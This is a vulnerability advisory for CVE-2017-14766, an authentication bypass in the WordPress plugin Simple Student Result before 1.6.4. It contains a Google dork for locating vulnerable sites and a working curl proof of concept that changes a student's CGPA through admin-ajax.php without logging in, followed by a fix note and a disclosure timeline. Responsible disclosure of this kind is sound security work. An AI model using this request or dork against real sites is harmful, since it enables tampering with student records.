Exploit Title: Simple Student Result < 1.6.4 - Auth Bypass
Google Dork: inurl:wp-content/plugins/simple-student-result
Exploit Author: Benjamin Lim
Vendor Homepage: https://ssr.saadamin.com/
Software Link: https://wordpress.org/plugins/simple-student-result/
Version: < 1.6.4
Tested on: Kali Linux 2.0
CVE : CVE-2017-14766
1. Product & Service Introduction:
Simple Student Result is a Wordpress plugin for managing student results. Administrators can create/update/delete results while unauthenticated users can lookup results by providing a student id number. As of now, the plugin has been downloaded 12,000 times and has 700+ active installs.
2. Technical Details & Description:
Authentication Bypass vulnerability in the Wordpress Simple Student Result plugin 1.6.3 allows unauthenticated attackers to update or delete student records with knowledge of only the student id number. The fn_ssr_add_st_submit() function and fn_ssr_del_st_submit() function in functions.php did not check if the current request is made by an authorized user, thus allowing any unauthenticated user to modify the records.
3. Proof of Concept (PoC):
To update student id 123's CGPA to 5.0:
curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: http://localhost/wp-admin/admin.php?page=ssr_add_results' --data-binary 'action=ssr_add_st_submit&rid=123&rn=456&stn=john&stfn=smith&stpy=2017&stcgpa=5.00&stsub=Subject+3&stpy2=01011990&stpy3=male&stpy4=address&stpy5=smith&stpy6=extra1&stpy7=extra2&upload_image=' 'https://localhost/wp-admin/admin-ajax.php'
Update to version 1.6.4
5. Disclosure Timeline
2017/09/20 Vendor contacted
2017/09/20 Vendor responded
2017/09/21 Update released
2017/09/21 Advisory released to the public
6. Credits & Authors:
Benjamin Lim - [https://limbenjamin.com]